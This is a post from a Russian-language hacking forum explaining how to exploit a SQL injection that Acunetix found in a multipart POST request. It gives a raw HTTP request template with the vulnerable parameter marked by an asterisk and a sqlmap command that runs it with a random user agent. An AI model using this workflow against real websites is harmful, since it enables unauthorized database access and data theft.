Показать сообщение отдельно

  #23  
Старый 28.03.2016, 22:16
Shubka75
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851

Репутация: 30
По умолчанию

Цитата:
Сообщение от .Light.  

acunetix нашел sql в пост запросе
Это так называемый multipart запрос, который передается в мап через текстовый файл с подобным содержимым:

Код:
POST /evil.php HTTP/1.1
Host: site.com
Content-Type: multipart/form-data; boundary=-------AcunetixBoundary_XRGQBWWRUS

-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="act"

idx
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="chk"

on
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="code"

01
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="fid"

*
Ставите ваш сайт в строку Host, ваш запрос в поле Post, а мультипарт вставляете в самом конце, отметив уязвимый параметр *. И тогда будет примерно такой запрос: sqlmap.py -r "C:\site.txt" --random-ag
 
Ответить с цитированием